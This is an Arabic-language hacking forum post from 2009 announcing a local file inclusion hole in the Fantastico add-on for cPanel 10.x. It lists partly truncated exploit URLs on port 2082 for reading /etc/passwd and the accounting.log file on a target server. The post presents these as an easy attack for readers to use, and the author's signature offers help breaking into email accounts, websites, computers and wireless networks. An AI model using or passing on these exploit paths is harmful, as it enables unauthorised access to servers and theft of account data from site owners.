عرض مشاركة واحدة
كُتب : [ 01-01-2009 ] [ حتى ] رقم المشاركة : ( 1 )

mostafa.ALIRAQI
بغدادي جديد


[بيآناَتي]
تاريخ التسجيل : Dec 2008
رقم العضوية :32330
آعجب بي :
آعجبت به :
الجنس : MALE/FE-MALE ~
العمر : 33
مكان الاقامة :
عدد آلمشاركات : 26
عدد آلمواضيع : 19
عدد النقاط : 50
مشآركاتي في اليوم بمعدل : 0.01
الدولة : علم دولتك
قوة التقييم : mostafa.ALIRAQI

تواصل معي



ثغرة في Cpanel جديدة وسهلة وخطيرة




ثغرة في Cpanel جديدة وسهلة وخطيرة

Fantastico In all Version Cpanel 10.x <= Local File Include

الوظيفة :

استعراض اي ملف على السيرفر ..

مكان الثغرة :

في برنامج Fantastico

الاستغلال :

xxx = عنوان الموقع

الثغرة الأولى :
الملف المصاب : load_*_**_**_**_**_**_**_**_*.php
http://www.xxx.com:2082/frontend/x/f...user/shell.php

يمكن استغلالها لعرض ملف الحسابات accounting.log

http://www.xxx.com:2082/frontend/x/f...accounting.log

وايضاًَ لعرض ملف اسماء المستخدمين passwd

http://www.xxx.com:2082/frontend/x/f..._*=/etc/passwd

الثغرة الثانية :
الملف المصاب : mysqlconfig.php

http://www.xxx.com:2082/frontend/x/f...th=/home/user/

يمكن استغلالها لعرض ملف الحسابات accounting.log

http://www.xxx.com:2082/frontend/x/f... counting.log

وايضاًَ لعرض ملف اسماء المستخدمين passwd

http://www.xxx.com:2082/frontend/x/f...th=/etc/passwd

طبعا اللها شرط الثغرا انو يكون مركب ومدعم سكريبت fantastico للتسوق وطبعا نسبة 95%
مركبين هالسكريبت

:59::59:








[ توقيعيَ ][mostafa.ALIRAQI][بروفايليَ]
هكــــر بغــــداد

نقرتين لعرض الصورة في صفحة مستقلة


عندك سؤال يختص بالهكر اختراق اميل اختراق موقع اختراق حاسبة اختراق الشبكات الواير ليس اومثلن الغات الفجول بيسك وغيرها اتفضل ضيفني اتريد تتعرف علية لضيفني احسن
البريد الالكتروني
f0_p0@yahoo.com

رد مع اقتباس